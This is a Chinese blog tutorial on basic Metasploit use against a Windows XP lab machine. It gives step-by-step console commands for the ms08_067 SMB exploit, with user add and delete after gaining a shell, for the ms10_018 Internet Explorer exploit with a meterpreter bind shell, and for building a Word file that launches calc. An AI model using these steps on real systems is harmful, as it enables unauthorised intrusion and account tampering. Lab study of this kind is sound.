Metasploit(MSF)的基础使用二

MSF渗透测试

使用Windows xp作为靶机

(一)、网络服务器攻击渗透

msfconsole进入MSF服务

 输入use命令可以使用该漏洞利用模块,列如use exploit/windows/smb/ms08_067_netapi

使用show options命令查看需要设置的参数

里面的LHODST为localhost,代表Kali的IP地址。而且端口是4444

set RHOST 192.168.67.130(搭建的靶场的IP)

run

使用shell命令可以拿到xp的shell

拿到xp的shell后可以使用net user查看用户

也可以添加用户

还可以删除用户

(二)、浏览器攻击渗透

(1)、大概介绍

msf 会生成一个网页 只要点击了这个网页就上线了

会把经过ms10_018的漏洞生成一个网页,只要把这个网页点开了之后控制权就到Kali中

(2)、实战操作

msfconsole

执行use exploit/windows/browser/ms10_018_ie_behaviors命令

设置自己服务器的IP,set SRVHOST 192.168.67.150(kali自己的IP)

设置payload正向连接的shell

set PAYLOAD windows/meteroreter/bind_tcp

为了方便识别,把端口设置为4441或4442,即使不设置也行

set LPORT 4441

exploit -j

Kali会生成一个url,我们只需要让目标主机访问这个url

#等待靶机执行

访问url

访问成功后在Kali中会出现successfully

jobs

sessions -i 1

i 是in的缩写,进入的意思

1表示id号

shell

现在就能执行shell了

(三)、生成word调用计算器的程序

进入msfconsole

use命令使用这个模块

设置一个payload

我们设置只要目标主机访问Word就自动弹出一个计算器

设置这个Word的名字为ceshi

run运行一下

含有.的话表示一个隐藏的文件夹,我们到root目录下找到隐藏的文件夹

在靶机上运行Word文件,发现直接自动调出计算器

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值